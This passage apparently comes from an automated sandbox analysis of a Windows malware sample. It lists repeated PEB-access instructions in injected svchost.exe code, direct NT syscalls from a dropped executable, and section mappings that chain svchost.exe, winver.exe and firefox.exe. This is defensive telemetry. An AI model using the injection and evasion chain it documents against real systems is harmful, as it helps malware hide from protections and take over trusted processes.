                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D437C mov eax, dword ptr fs:[00000030h]8_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A0634F mov eax, dword ptr fs:[00000030h]8_2_03A0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E284 mov eax, dword ptr fs:[00000030h]8_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E284 mov eax, dword ptr fs:[00000030h]8_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B0283 mov eax, dword ptr fs:[00000030h]8_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B0283 mov eax, dword ptr fs:[00000030h]8_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B0283 mov eax, dword ptr fs:[00000030h]8_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039402A0 mov eax, dword ptr fs:[00000030h]8_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039402A0 mov eax, dword ptr fs:[00000030h]8_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov eax, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov ecx, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov eax, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov eax, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov eax, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov eax, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A2C3 mov eax, dword ptr fs:[00000030h]8_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A2C3 mov eax, dword ptr fs:[00000030h]8_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A2C3 mov eax, dword ptr fs:[00000030h]8_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A2C3 mov eax, dword ptr fs:[00000030h]8_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A2C3 mov eax, dword ptr fs:[00000030h]8_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039402E1 mov eax, dword ptr fs:[00000030h]8_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039402E1 mov eax, dword ptr fs:[00000030h]8_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039402E1 mov eax, dword ptr fs:[00000030h]8_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A062D6 mov eax, dword ptr fs:[00000030h]8_2_03A062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392823B mov eax, dword ptr fs:[00000030h]8_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A250 mov eax, dword ptr fs:[00000030h]8_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936259 mov eax, dword ptr fs:[00000030h]8_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EA250 mov eax, dword ptr fs:[00000030h]8_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EA250 mov eax, dword ptr fs:[00000030h]8_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B8243 mov eax, dword ptr fs:[00000030h]8_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B8243 mov ecx, dword ptr fs:[00000030h]8_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03934260 mov eax, dword ptr fs:[00000030h]8_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03934260 mov eax, dword ptr fs:[00000030h]8_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03934260 mov eax, dword ptr fs:[00000030h]8_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392826B mov eax, dword ptr fs:[00000030h]8_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A0625D mov eax, dword ptr fs:[00000030h]8_2_03A0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B019F mov eax, dword ptr fs:[00000030h]8_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B019F mov eax, dword ptr fs:[00000030h]8_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B019F mov eax, dword ptr fs:[00000030h]8_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B019F mov eax, dword ptr fs:[00000030h]8_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A197 mov eax, dword ptr fs:[00000030h]8_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A197 mov eax, dword ptr fs:[00000030h]8_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A197 mov eax, dword ptr fs:[00000030h]8_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03970185 mov eax, dword ptr fs:[00000030h]8_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EC188 mov eax, dword ptr fs:[00000030h]8_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EC188 mov eax, dword ptr fs:[00000030h]8_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D4180 mov eax, dword ptr fs:[00000030h]8_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D4180 mov eax, dword ptr fs:[00000030h]8_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A061E5 mov eax, dword ptr fs:[00000030h]8_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE1D0 mov eax, dword ptr fs:[00000030h]8_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE1D0 mov eax, dword ptr fs:[00000030h]8_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]8_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE1D0 mov eax, dword ptr fs:[00000030h]8_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE1D0 mov eax, dword ptr fs:[00000030h]8_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F61C3 mov eax, dword ptr fs:[00000030h]8_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F61C3 mov eax, dword ptr fs:[00000030h]8_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039601F8 mov eax, dword ptr fs:[00000030h]8_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DA118 mov ecx, dword ptr fs:[00000030h]8_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DA118 mov eax, dword ptr fs:[00000030h]8_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DA118 mov eax, dword ptr fs:[00000030h]8_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DA118 mov eax, dword ptr fs:[00000030h]8_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F0115 mov eax, dword ptr fs:[00000030h]8_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov ecx, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov ecx, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov ecx, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov ecx, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03960124 mov eax, dword ptr fs:[00000030h]8_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392C156 mov eax, dword ptr fs:[00000030h]8_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C8158 mov eax, dword ptr fs:[00000030h]8_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04164 mov eax, dword ptr fs:[00000030h]8_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04164 mov eax, dword ptr fs:[00000030h]8_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936154 mov eax, dword ptr fs:[00000030h]8_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936154 mov eax, dword ptr fs:[00000030h]8_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C4144 mov eax, dword ptr fs:[00000030h]8_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C4144 mov eax, dword ptr fs:[00000030h]8_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C4144 mov ecx, dword ptr fs:[00000030h]8_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C4144 mov eax, dword ptr fs:[00000030h]8_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C4144 mov eax, dword ptr fs:[00000030h]8_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393208A mov eax, dword ptr fs:[00000030h]8_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F60B8 mov eax, dword ptr fs:[00000030h]8_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F60B8 mov ecx, dword ptr fs:[00000030h]8_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039280A0 mov eax, dword ptr fs:[00000030h]8_2_039280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C80A8 mov eax, dword ptr fs:[00000030h]8_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B20DE mov eax, dword ptr fs:[00000030h]8_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392C0F0 mov eax, dword ptr fs:[00000030h]8_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039720F0 mov ecx, dword ptr fs:[00000030h]8_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039380E9 mov eax, dword ptr fs:[00000030h]8_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B60E0 mov eax, dword ptr fs:[00000030h]8_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E016 mov eax, dword ptr fs:[00000030h]8_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E016 mov eax, dword ptr fs:[00000030h]8_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E016 mov eax, dword ptr fs:[00000030h]8_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E016 mov eax, dword ptr fs:[00000030h]8_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B4000 mov ecx, dword ptr fs:[00000030h]8_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C6030 mov eax, dword ptr fs:[00000030h]8_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A020 mov eax, dword ptr fs:[00000030h]8_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392C020 mov eax, dword ptr fs:[00000030h]8_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03932050 mov eax, dword ptr fs:[00000030h]8_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B6050 mov eax, dword ptr fs:[00000030h]8_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395C073 mov eax, dword ptr fs:[00000030h]8_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D678E mov eax, dword ptr fs:[00000030h]8_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039307AF mov eax, dword ptr fs:[00000030h]8_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E47A0 mov eax, dword ptr fs:[00000030h]8_2_039E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393C7C0 mov eax, dword ptr fs:[00000030h]8_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B07C3 mov eax, dword ptr fs:[00000030h]8_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039347FB mov eax, dword ptr fs:[00000030h]8_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039347FB mov eax, dword ptr fs:[00000030h]8_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039527ED mov eax, dword ptr fs:[00000030h]8_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039527ED mov eax, dword ptr fs:[00000030h]8_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039527ED mov eax, dword ptr fs:[00000030h]8_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BE7E1 mov eax, dword ptr fs:[00000030h]8_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03930710 mov eax, dword ptr fs:[00000030h]8_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03960710 mov eax, dword ptr fs:[00000030h]8_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C700 mov eax, dword ptr fs:[00000030h]8_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396273C mov eax, dword ptr fs:[00000030h]8_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396273C mov ecx, dword ptr fs:[00000030h]8_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396273C mov eax, dword ptr fs:[00000030h]8_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AC730 mov eax, dword ptr fs:[00000030h]8_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C720 mov eax, dword ptr fs:[00000030h]8_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C720 mov eax, dword ptr fs:[00000030h]8_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03930750 mov eax, dword ptr fs:[00000030h]8_2_03930750
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_005680A9
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0053A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0053A155
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0053A124 SetUnhandledExceptionFilter,0_2_0053A124

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtTerminateThread: Direct from: 0x77762FCC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Section loaded: NULL, target: C:\Windows\SysWOW64\svchost.exe, protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe, Section loaded: NULL, target: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe, Section loaded: NULL, target: C:\Windows\SysWOW64\winver.exe, protection: execute and read and write
                Source: C:\Windows\SysWOW64\winver.exe, Section loaded: NULL, target: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, protection: read write
                Source: C:\Windows\SysWOW64\winver.exe, Section loaded: NULL, target: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, protection: execute and read and write
                Source: C:\Windows\SysWOW64\winver.exe, Section loaded: NULL, target: C:\Program Files\Mozilla Firefox\firefox.exe, protection: read write
                Source: C:\Windows\SysWOW64\winver.exe, Section loaded: NULL, target: C:\Program Files\Mozilla Firefox\firefox.exe, protection: execute and read and write
                Source: C:\Windows\SysWOW64\winver.exe, Thread register set: target process: 7828
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Memory written: C:\Windows\SysWOW64\svchost.exe, base: 2FA0008
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_005687B1 LogonUserW
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_00513B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
